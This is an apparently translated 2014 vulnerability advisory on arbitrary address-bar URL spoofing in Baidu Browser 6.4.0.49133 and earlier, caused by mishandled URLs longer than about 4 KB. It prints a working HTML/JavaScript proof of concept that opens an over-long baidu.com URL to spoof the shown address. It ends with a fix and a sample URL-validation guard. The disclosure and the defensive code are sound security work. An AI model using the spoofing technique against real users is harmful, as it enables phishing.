
Browser vulnerability: Baidu Browser 6.4.0.49133 arbitrary URL spoofing

  Published: 2014-09-25 16:01:22   Author: anonymous

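  A vulnerability was recently found in Baidu Browser: version 6.4.0.49133 and earlier allow arbitrary URL spoofing. An arbitrary protocol (http/https/ftp...), domain and URL can be spoofed, because the browser mishandles URLs longer than 4 KB. For example, save the proof file as c:\a.htm and open it; after clicking the link, the address shown can be an arbitrary spoofed URL.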

  In addition, when the URL is too long the "bookmarked" icon is displayed, so there is probably a small logic error in how over-long URLs are handled.

  Proof of vulnerability:


The code is as follows:
  <html>
  <div id='c' style=''> //displaynone
  ss
  </div>
  <a href="#" target="newwin" id='v' style="display:block" onclick="invokePoC();window.open('javascript:1;','newwin');">just click me</a>
  <script>
  function invokePoC() {
  wx = open("http://www.baidu.com/account/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</p> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
","newwin");//setInterval("doit()",5000);
  }
  if(window.name == "newwin")
  {
  document.getElementById('c').innerText = ':). due to an internal error(>10Kbytes url), the fav icon will be shown. if you just want the shortest url, just make it for about 4KB';document.write("<title>:)</title>");
  document.getElementById('v').style.display = 'none';}
  </script>
  </html>

  Fix:

  Filter invalid URLs promptly so that the displayed address cannot be spoofed.
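
  One way to apply this fix, as an added example that is not Baidu Browser code and is not from the original article: a guard that decides what the address bar may show and fails closed when the URL is over-long, unparseable, or uses a disallowed scheme. The function name, the hard 4096-byte cap (taken from the 4 KB figure above), the scheme list and the display width are all assumptions.

```javascript
// Added example: hypothetical address-bar guard, not Baidu Browser code.
const MAX_URL_BYTES = 4096;            // assumed cap, from the ~4 KB in the report
const ALLOWED_SCHEMES = new Set(["http:", "https:", "ftp:"]);
const MAX_DISPLAY_CHARS = 80;          // assumed UI width for the path portion

// Decide whether a navigation may proceed and what the address bar shows.
// Key property: on any failure the result is a fixed safe value, never the
// requested string and never a stale value left over from another page.
function resolveAddressBar(requestedUrl) {
  const blocked = (reason) => ({ allowed: false, display: "about:blank", reason });

  if (typeof requestedUrl !== "string" || requestedUrl.length === 0) {
    return blocked("empty");
  }
  // Measure bytes, not characters: non-ASCII URLs grow when encoded.
  if (new TextEncoder().encode(requestedUrl).length > MAX_URL_BYTES) {
    return blocked("too-long");
  }
  let parsed;
  try {
    parsed = new URL(requestedUrl);
  } catch {
    return blocked("unparseable");
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return blocked("scheme");
  }
  // Build the display string from the parsed components, so the origin shown
  // is the origin that will actually be loaded. Only the tail is elided.
  const tail = parsed.pathname + parsed.search + parsed.hash;
  const shownTail = tail.length > MAX_DISPLAY_CHARS
    ? tail.slice(0, MAX_DISPLAY_CHARS) + "..."
    : tail;
  return { allowed: true, display: parsed.origin + shownTail, reason: "ok" };
}

// Constructed sample inputs.
const longUrl = "http://example.test/account/" + "A".repeat(5000);
console.log(resolveAddressBar(longUrl));
console.log(resolveAddressBar("https://example.test/login?next=/home"));
console.log(resolveAddressBar("javascript:1;"));
```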
